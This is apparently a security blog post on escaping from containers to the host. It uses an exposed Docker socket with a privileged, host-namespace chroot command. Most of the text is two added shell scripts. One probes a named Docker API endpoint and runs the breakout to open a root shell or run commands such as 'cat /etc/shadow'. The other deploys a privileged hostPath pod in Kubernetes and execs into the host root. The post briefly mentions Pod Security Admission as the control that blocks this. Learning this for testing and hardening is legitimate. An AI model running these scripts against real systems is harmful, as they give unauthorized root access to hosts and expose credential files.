The best way I've found to execute commands on the underlying host through an exposed Docker socket is Ian Miell's most pointless docker command ever. The Docker daemon runs as root by default, so anyone who can talk to its socket can ask it to start a container with whatever settings they like, and this command asks for a container that is, for practical purposes, the host itself.
The command looks like this:
docker run -ti --privileged --net=host --pid=host --ipc=host --volume /:/host busybox chroot /host
and will essentially drop you straight into a full root shell on the underlying host.
To break the command down:
-ti allocates a terminal and keeps stdin open, so the shell you end up in is interactive.
--privileged removes Docker's default hardening: the container gets every capability, the default seccomp and AppArmor profiles are not applied, and the host's devices are exposed to it.
--net=host --pid=host --ipc=host run the process in the host's network, PID and IPC namespaces instead of giving it a separate set, so it sees (and can signal) every host process and uses the host's network interfaces directly.
--volume /:/host bind-mounts the host's root filesystem at /host inside the container.
chroot /host, given as the container's command, switches the process's root directory to that mount, so the shell you land in sees the host's own binaries, files and configuration rather than busybox's.
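The command above assumes your docker CLI already points at the exposed socket. As an added example (my own, not code from the original post or from Ian Miell's gist), the script below wraps the same command so it can be aimed at a target you name: a TCP endpoint such as an unauthenticated port 2375, or a socket file that has been mounted into the container you are already sitting in. It first checks that the API answers on the unauthenticated /version endpoint, then builds the docker run line. The target addresses used in the comments (10.0.0.5:2375 and so on) are placeholders for illustration.

```shell
#!/bin/sh
# Added example, not code from the original post or from Ian Miell's gist.
# Wraps the breakout command so it can be pointed at an exposed Docker socket:
# either a TCP endpoint (the classic unauthenticated 2375 port) or a socket
# file mounted into the container you are already in. Addresses such as
# 10.0.0.5:2375 below are placeholders for illustration.

# Normalise a target into the URI form the docker CLI accepts after "-H".
#   /var/run/docker.sock    -> unix:///var/run/docker.sock
#   10.0.0.5:2375           -> tcp://10.0.0.5:2375
#   tcp://... or unix://... -> returned unchanged
docker_host_uri() {
  case "$1" in
    tcp://*|unix://*) printf '%s\n' "$1" ;;
    /*)               printf 'unix://%s\n' "$1" ;;
    *:[0-9]*)         printf 'tcp://%s\n' "$1" ;;
    *) printf 'docker_host_uri: unsupported target %s\n' "$1" >&2; return 1 ;;
  esac
}

# Cheap confirmation that the API is reachable before doing anything noisy:
# the unauthenticated /version endpoint answers with the daemon's version JSON.
# Needs curl; a unix socket is reached with --unix-socket.
probe_docker_api() {
  uri=$(docker_host_uri "$1") || return 1
  case "$uri" in
    unix://*) curl -sf --max-time 5 --unix-socket "${uri#unix://}" http://localhost/version ;;
    tcp://*)  curl -sf --max-time 5 "http://${uri#tcp://}/version" ;;
  esac
}

# Print the full breakout command for a target. With no further arguments it
# allocates a TTY and drops into a root shell on the host; with arguments it
# runs that command inside the host chroot non-interactively, which is handy
# for a single check such as "id" or "cat /etc/shadow".
breakout_cmd() {
  uri=$(docker_host_uri "$1") || return 1
  shift
  opts="--rm --privileged --net=host --pid=host --ipc=host --volume /:/host busybox chroot /host"
  if [ $# -eq 0 ]; then
    printf 'docker -H %s run -ti %s\n' "$uri" "$opts"
  else
    printf 'docker -H %s run %s %s\n' "$uri" "$opts" "$*"
  fi
}

# Run the breakout for real only when a target is given in the environment:
#   DOCKER_TARGET=10.0.0.5:2375 sh ./breakout.sh            (interactive shell)
#   DOCKER_TARGET=/var/run/docker.sock sh ./breakout.sh id  (single command)
if [ -n "${DOCKER_TARGET:-}" ]; then
  probe_docker_api "$DOCKER_TARGET" >/dev/null || { echo "Docker API not reachable at $DOCKER_TARGET" >&2; exit 1; }
  sh -c "$(breakout_cmd "$DOCKER_TARGET" "$@")"
fi
```

The --rm added to the generated command just tidies up the container afterwards; it changes nothing about what the shell can do. If curl gets no answer on a TCP target, the port is probably not the API at all (or is TLS-only, in which case you need the client certificate as well and the trick is not "exposed" in the sense used here).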
If you're running via Kubernetes, you can use The most pointless Kubernetes command, which effectively does the same thing: a pod can ask for the host's PID, network and IPC namespaces, a privileged security context and a hostPath mount of /, which is everything the docker command above asks for (assuming the cluster doesn't have a restrictive Pod Security Policy in place). On clusters where PodSecurityPolicy has been removed (Kubernetes 1.25 onwards) the equivalent control is Pod Security Admission, whose baseline profile rejects every one of those settings.
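As an added example (mine, not the original post's or the linked gist's code), here is the Kubernetes form of the same breakout: a pod manifest that maps each docker flag to its pod-spec equivalent, plus a helper that applies it and execs into the host root. Pod name and node name are placeholders, and the cluster is assumed not to enforce Pod Security Admission or a restrictive policy.

```shell
#!/bin/sh
# Added example, not code from the original post or from the linked gist:
# the Kubernetes equivalent of the docker breakout, as a pod that asks for the
# host's PID, network and IPC namespaces, privileged mode and the host root
# filesystem mounted at /host. Pod name and node name are placeholders; the
# cluster is assumed not to enforce Pod Security Admission or a PSP.

# Emit the pod manifest. $1 = pod name, $2 = optional node to schedule onto
# (pick a control-plane node if that is the host you actually want).
host_shell_pod_manifest() {
  name="$1"
  node="${2:-}"
  node_line=""
  if [ -n "$node" ]; then
    node_line="  nodeName: ${node}"
  fi
  cat <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: ${name}
spec:
  hostPID: true                  # --pid=host
  hostNetwork: true              # --net=host
  hostIPC: true                  # --ipc=host
  restartPolicy: Never
${node_line}
  containers:
  - name: shell
    image: busybox
    securityContext:
      privileged: true           # --privileged
    # Keep the container alive so we can exec into it; chroot happens at exec time.
    command: ["sleep", "86400"]
    volumeMounts:
    - name: host-root
      mountPath: /host           # --volume /:/host
  volumes:
  - name: host-root
    hostPath:
      path: /
EOF
}

# Create the pod, wait until it is running, then drop into the host root.
# Remove the pod afterwards with: kubectl delete pod <name>
host_shell() {
  name="$1"
  host_shell_pod_manifest "$name" "${2:-}" | kubectl apply -f -
  kubectl wait --for=condition=Ready "pod/${name}" --timeout=60s
  kubectl exec -it "$name" -- chroot /host
}

# Run for real only when a pod name is given in the environment:
#   POD_NAME=hostshell NODE_NAME=node-1 sh ./k8s-breakout.sh
if [ -n "${POD_NAME:-}" ]; then
  host_shell "$POD_NAME" "${NODE_NAME:-}"
fi
```

Keeping the container on sleep and doing the chroot at exec time (rather than as the pod's command) means the pod stays Ready even if the host's default shell is somewhere unexpected, and you can exec in as many times as you like. If the apply is rejected with a message naming a pod security standard or an admission webhook, that is the restrictive policy the text mentions doing its job.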